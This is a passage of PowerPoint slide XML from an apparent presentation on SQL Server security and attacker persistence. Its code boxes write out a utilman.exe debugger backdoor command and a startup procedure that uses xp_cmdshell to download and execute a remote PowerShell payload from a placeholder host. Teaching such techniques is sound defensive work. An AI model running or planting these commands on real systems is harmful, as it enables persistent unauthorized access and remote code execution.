              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>jobs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>triggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>existing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and much more. On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>operating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>system’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> registry, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4DD774-8FAE-704D-804B-2E80E8C468E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4485118"/>
            <a:ext cx="11041227" cy="54386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467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLPersistRegDebugger-Verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>FileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>utilman.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 'c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>\system32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>' -Instance "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SQLServerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>InstanceName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1467" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9A000FC-6765-5E4E-96C8-6BBE260A5082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5242197"/>
            <a:ext cx="11247040" cy="76963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467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sp_autops</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1467" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>AS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>xp_cmdshell'powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>-C "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>new-object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>(''http://webserver/payload.ps1'')"'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14080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AB5D8-A562-41E1-89DD-4953066D543A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA7B9128-1B40-41E9-BF2F-DE42D4449B6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="460235" y="2171700"/>
            <a:ext cx="7898905" cy="2851691"/>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a:solidFill>
                <a:srgbClr val="002050"/>
              </a:solidFill>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{845598D5-1A3E-4D3E-80A6-0CC85712DE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8396845" y="2174234"/>
            <a:ext cx="3337955" cy="2849125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3E9AE1"/>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="137160" tIns="89642" rIns="137160" bIns="89642" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="002050"/>
              </a:solidFill>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51BF5693-3A1D-49F3-9CBE-0A15B1E1CCF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452283" y="5774435"/>
            <a:ext cx="11284068" cy="741302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002050"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="0" rIns="0" bIns="182880" rtlCol="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="002050"/>
              </a:solidFill>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C624F1-BFF6-46F7-B188-AB115ED00FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452282" y="5033298"/>
            <a:ext cx="11284071" cy="741302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0055A2"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="0" rIns="0" bIns="182880" rtlCol="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="002050"/>
              </a:solidFill>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Pentagon 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F7F2FE-2AA5-4167-90A6-BD7B82DC8035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="2125663"/>
            <a:ext cx="1339007" cy="2897989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="vert270" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="400" spc="100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data virtualization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4AEF0D5-FE5B-4737-968B-2ACB9C8D6290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8554380" y="3598796"/>
            <a:ext cx="3022884" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85E0FE57-2FC0-42DD-BA74-1E9584773702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808249" y="3002457"/>
            <a:ext cx="5259917" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Pentagon 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F08A1BEE-39CB-4B20-857A-A169946D192B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7231380" y="2179320"/>
            <a:ext cx="1127760" cy="2840690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="vert270" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="400" spc="100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data integration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458A04E2-906A-4FCD-80FD-9625350FD3A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808249" y="4109921"/>
            <a:ext cx="5259917" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="none"/>
          </a:ln>
